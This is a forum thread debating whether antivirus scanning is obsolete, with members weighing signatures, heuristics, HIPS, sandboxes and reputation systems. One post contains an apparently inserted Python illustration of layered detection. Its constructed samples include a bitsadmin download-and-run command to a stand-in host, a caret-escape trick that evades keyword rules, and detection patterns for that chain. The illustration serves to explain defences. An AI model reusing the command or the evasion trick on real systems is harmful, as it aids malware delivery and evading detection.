Is Anti-Virus Scanning/Detection Obsolete?

  • Thread starter Deleted member 178

Deleted member 178

Thread author
The title and topic of this article are clearly controversial. It is guaranteed to get a strong reaction from the anti-virus industry, which is firmly convinced it sees clear sailing ahead. So, is anti-virus scanning obsolete? In a word, yes - but don't throw out your scanner. Its replacement hasn't been created yet. In this article we will examine the weaknesses of virus scanning that will cause its eventual downfall.

Anti-virus scanning is based upon the age-old principle of Newton's law: for every action there is an equal and opposite reaction. Each time a new virus, or a new viral approach, is discovered, anti-virus scanners must be updated. To be sure, this isn't always true. Heuristic scanning does have the capability to recognize some attacks as viral without having specific detection for the virus it has alerted on. In general, however, each new virus discovery requires an update of the scanning software's "virus definition" files in order for the scanner to recognize the new virus.

In some cases (Melissa, for example) the scan "engine" (the algorithm that does the comparison between the virus' behavior and the virus definition files and identifies viral content) must also be updated for the anti-virus scanner to be effective at detection (and hopefully eradication). This constant updating process has several flaws. We'll look at these flaws in detail.

Source

If you pick the average person off the street and ask them about information security, most of them will likely associate the term with the antivirus software on their computers. Most "civilians" are unfamiliar with terms such as "HIPS," "IDS," "IPS" and the vast assortment of other security products commonly in use. Those sorts of things operate behind the scenes. But AV packages are widely deployed and are often offered free of charge when you buy a new computer -- at least for the first 30 days.

But, as the malware war continues to escalate, it is reasonable to question the level of effectiveness that antivirus software, as a category, brings to the table.

"When last I looked, there were 78,500,000 unique instances of malware, according to AV-Test.org," said Paul Henry, security and forensic analyst at Lumension, a Scottsdale, Ariz.-based endpoint security company. "How in the world is anyone going to keep up with the signatures to inspect that large of a database?"

Source


Old articles but still valid.
 

spywar

Level 11
Oct 26, 2012
1,011
Of course this is obsolete .... Who does not know?
That's why Symantec developed Norton Insight, which is quite powerful ...
Comodo has developed autosandboxing tech based on DDP (anything not whitelisted is run inside the autosandbox).
Avast has developed autosandboxing tech based on FileRep and other things (anything with low rep is run inside the autosandbox)...

Off topic: please reply to my last PM.
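The two mechanisms discussed so far, the signature-plus-heuristic scanning described in the article quoted in the first post and the whitelist/reputation autosandboxing spywar mentions, as one added illustration in Python. This is not code from the article, from Comodo, Avast or Symantec, or from anyone in this thread. The sample files, the detection name "Dropper.Constructed.A", the two heuristic rules, the two-hit blocking rule, the prevalence threshold and the reputation data are all constructed for the example:

```python
"""Layered verdict pipeline for a file: signature scan, heuristic scan, then a
default-deny reputation gate for anything still unknown.

Added illustration for this thread, not code from any product named in it.
Every definition, sample file and reputation figure below is constructed.
"""
import hashlib
import re
from dataclasses import dataclass, field

# --- Constructed samples ----------------------------------------------------
# Stand-in "dropper": a PE-like header followed by a download-and-run command.
KNOWN_SAMPLE = (
    b"MZ\x90\x00" + b"\x00" * 12
    + b"cmd.exe /c bitsadmin /transfer j http://203.0.113.7/p.exe %TEMP%\\p.exe"
)
# Same dropper re-pointed at a new C2 host: hash and byte pattern no longer match.
VARIANT_NEW_C2 = KNOWN_SAMPLE.replace(b"203.0.113.7", b"203.0.113.8")
# Same, plus a cmd.exe caret escape (cmd strips '^'), which breaks the keyword.
VARIANT_OBFUSCATED = VARIANT_NEW_C2.replace(b"bitsadmin", b"b^itsadmin")
# Clean files: one the vendor has whitelisted, one nobody has seen before.
TRUSTED_TOOL = b"MZ\x90\x00" + b"\x00" * 12 + b"This program cannot be run in DOS mode."
FRESH_TOOL = b"MZ\x90\x00" + b"\x00" * 12 + b"internal build 0.0.1, compiled today"

def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

# --- Layer 1: signatures (the "virus definition file") ----------------------
HASH_DEFS = {sha256(KNOWN_SAMPLE): "Dropper.Constructed.A"}           # exact file
PATTERN_DEFS = {b"http://203.0.113.7/p.exe": "Dropper.Constructed.A"}  # byte run

# --- Layer 2: heuristics (rules shaped like behaviour, not like one sample) --
HEURISTIC_RULES = [
    (re.compile(rb"cmd\.exe\s+/c\s+bitsadmin\s+/transfer", re.I), "download-and-execute chain"),
    (re.compile(rb"\.exe\s+%TEMP%\\", re.I), "drops executable into %TEMP%"),
]

# --- Layer 3: whitelist / reputation gate (default-deny autosandbox) --------
@dataclass
class Reputation:
    whitelist: set = field(default_factory=set)      # sha256 of vendor-trusted files
    prevalence: dict = field(default_factory=dict)   # sha256 -> machines seen running it

@dataclass(frozen=True)
class Verdict:
    action: str   # "block", "allow" or "sandbox"
    layer: str    # which layer decided
    reason: str

def signature_scan(data: bytes):
    """Return the detection name on an exact-hash or byte-pattern hit, else None."""
    name = HASH_DEFS.get(sha256(data))
    if name:
        return name
    return next((n for pat, n in PATTERN_DEFS.items() if pat in data), None)

def heuristic_scan(data: bytes):
    """Return the labels of every heuristic rule that fires on the file."""
    return [label for rx, label in HEURISTIC_RULES if rx.search(data)]

def judge(data: bytes, rep: Reputation, min_prevalence: int = 1000) -> Verdict:
    """Signature first, heuristics second, reputation gate for the rest.
    Two heuristic hits are required to block, so a single noisy rule does
    not turn into an outright removal (constructed policy, not a vendor's)."""
    name = signature_scan(data)
    if name:
        return Verdict("block", "signature", name)
    hits = heuristic_scan(data)
    if len(hits) >= 2:
        return Verdict("block", "heuristic", "; ".join(hits))
    h = sha256(data)
    if h in rep.whitelist:
        return Verdict("allow", "reputation", "whitelisted")
    if rep.prevalence.get(h, 0) >= min_prevalence:
        return Verdict("allow", "reputation", f"seen on {rep.prevalence[h]} machines")
    # Default deny: unknown and unpopular runs sandboxed, even when it is benign.
    return Verdict("sandbox", "reputation", "unknown file, low prevalence")

REP = Reputation(whitelist={sha256(TRUSTED_TOOL)})   # constructed reputation data

SAMPLES = {
    "known sample": KNOWN_SAMPLE,
    "variant, new C2": VARIANT_NEW_C2,
    "variant, obfuscated": VARIANT_OBFUSCATED,
    "trusted tool": TRUSTED_TOOL,
    "fresh internal tool": FRESH_TOOL,
}

def run_all(rep: Reputation = REP) -> dict:
    """Verdict for every constructed sample, keyed by its label."""
    return {label: judge(data, rep) for label, data in SAMPLES.items()}

if __name__ == "__main__":
    for label, v in run_all().items():
        print(f"{label:22} -> {v.action:8} [{v.layer}] {v.reason}")
```

Run it and the layers fail in the order the article predicts: changing one octet of the C2 address defeats both the exact hash and the byte-pattern signature, so only the heuristic rules still catch that variant; a caret escape in the command line (which cmd.exe ignores at run time) then drops the file to a single heuristic hit, and the only thing left standing is the default-deny gate, which sandboxes it as unknown. The same gate also sandboxes the brand-new, perfectly clean internal build, which is the usability cost that whitelisting and reputation approaches trade for coverage of what the definition files have not seen yet.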
 

Deleted member 178

Thread author
I posted it because many new members of various knowledge levels still choose their AV only by detection results made by so-called "independent test labs".
 

spywar

Level 11
Oct 26, 2012
1,011
True, that statement is true.

Things like this http://threatcenter.crdf.fr/?Stats are obviously useless.
 

Deleted member 178

Thread author
spywar said:
Things like this http://threatcenter.crdf.fr/?Stats are obviously useless.

The favorite test lab of Comodo fans :p (one of the few that test CIS).
 

spywar

Level 11
Oct 26, 2012
1,011
Why is PCtools 5th while Symantec is 19th? .... Don't they use the same signatures?
 

Deleted member 178

Thread author
I don't know, since I don't trust test labs.
 

illumination

Thread author
Umbra Corp. said:
I don't know, since I don't trust test labs.

You don't trust that Emsisoft is only hitting a 17% detection rate with its dual engine, while McAfee hit 41%? :lol: ;) :D

You know I couldn't resist, Umbra; I don't trust these tests any more than you do..
 

Jack

Administrator
Verified
Staff Member
Well-known
Jan 24, 2011
9,377
No, the antivirus is not obsolete, and is very useful.
A good antivirus engine will detect 85% of the new zero-day threats, and if the malware has been in the wild for a while it has an even higher chance of detecting the malicious file.

Unlike a HIPS or a sandbox, which are used to protect the system from unwanted modifications or attacks, an antivirus will actually give the user a verdict, which will clearly indicate whether the file is malicious or not.
The fact that an antivirus can detect a malicious file before executing it or while it's running, and alert the user with the clear statement "THIS FILE IS INFECTED! YOU NEED TO REMOVE IT" ... it's the most security-friendly approach for most users.
A HIPS or a sandbox will protect the system, however they can't detect the malicious files; they will just block certain operations or ask the user (with a confusing message: "This file wants to do this, do you want to allow this?") no matter if the file is malicious or not.


So, is the antivirus obsolete? NO, definitely not! When you want to really secure a laptop for regular users, you need to use a combination of an antivirus, HIPS, BB and sandbox. A combination of these layers is needed to really protect a system.

An antivirus will not only bring detection into any security setup, it will also take a lot of the responsibility for security decisions off the user......
 

spywar

Level 11
Oct 26, 2012
1,011
Jack said:
No, the antivirus is not obsolete, and is very useful.
A good antivirus engine will detect 85% of the new zero-day threats, and if the malware has been in the wild for a while it has an even higher chance of detecting the malicious file.

Unlike a HIPS or a sandbox, which are used to protect the system from unwanted modifications or attacks, an antivirus will actually give the user a verdict, which will clearly indicate whether the file is malicious or not.
The fact that an antivirus can detect a malicious file before executing it or while it's running, and alert the user with the clear statement "THIS FILE IS INFECTED! YOU NEED TO REMOVE IT" ... it's the most security-friendly approach for most users.
A HIPS or a sandbox will protect the system, however they can't detect the malicious files; they will just block certain operations or ask the user (with a confusing message: "This file wants to do this, do you want to allow this?") no matter if the file is malicious or not.


So, is the antivirus obsolete? NO, definitely not! When you want to really secure a laptop for regular users, you need to use a combination of an antivirus, HIPS, BB and sandbox. A combination of these layers is needed to really protect a system.

An antivirus will not only bring detection into any security setup, it will also take a lot of the responsibility for security decisions off the user......
Completely true!
However, this statement, "A HIPS or a Sandbox will protect the system however they can't detect the malicious files", is not 100% accurate.
For example:

If CIMA detects malicious behavior in an unknown file which has previously been sandboxed, then the user will get an alert: CloudBehavior.Suspicious ...

If Avast's Autosandbox detects the file to be malware using the Dyna rules, then the user will get a very clear alert: Avast's AutoSandbox has blocked a malware, etc ...
 

illumination

Thread author
Jack said:
No, the antivirus is not obsolete, and is very useful.
A good antivirus engine will detect 85% of the new zero-day threats, and if the malware has been in the wild for a while it has an even higher chance of detecting the malicious file.

Unlike a HIPS or a sandbox, which are used to protect the system from unwanted modifications or attacks, an antivirus will actually give the user a verdict, which will clearly indicate whether the file is malicious or not.
The fact that an antivirus can detect a malicious file before executing it or while it's running, and alert the user with the clear statement "THIS FILE IS INFECTED! YOU NEED TO REMOVE IT" ... it's the most security-friendly approach for most users.
A HIPS or a sandbox will protect the system, however they can't detect the malicious files; they will just block certain operations or ask the user (with a confusing message: "This file wants to do this, do you want to allow this?") no matter if the file is malicious or not.


So, is the antivirus obsolete? NO, definitely not! When you want to really secure a laptop for regular users, you need to use a combination of an antivirus, HIPS, BB and sandbox. A combination of these layers is needed to really protect a system.

An antivirus will not only bring detection into any security setup, it will also take a lot of the responsibility for security decisions off the user......

Exactly, Jack, thank you; I have been trying to say this in many different ways. AVs are your front-line defense; if anything makes it past the AV, then the HIPS/BB/virtualization can come into play. Nowadays it is wise to use all of the above in overlapping fields of protection.

It is as you said, for most novice users, the most security friendly approach.
 

jamescv7

Level 85
Verified
Honorary Member
Mar 15, 2011
13,070
Anti-virus scanning and detection is still effective today, and has perhaps been the main solution since malware/viruses first appeared at the beginning of the era.

And in this generation it exists as one layer of defense protection, alongside the traditional way of preventing those threats, but it is not obsolete.

Plus, users feel confident with an AV running on their systems.
 

spywar

Level 11
Oct 26, 2012
1,011
Automated analysis systems work pretty well ... Be prepared to see more of them: Valkyrie/APC (Avira Protection Cloud, which will be part of Avira free AV sooner or later). AI engines work very well to detect zero-day threats.
 

Gnosis

Level 5
Apr 26, 2011
2,779
Think "eclectic collection" as it might pertain to a solid malware defense.

What is good for some of us will not do for the masses. A suite, whether you make your own with freeware or buy it from G-Data or ESET, is needed more and more these days, esp. with the gov/military issues floating around as fallout from their cyber wars. An AV, as Illumination stated, is the front line. Scanning or checking for false program logic will always be needed as well.
 
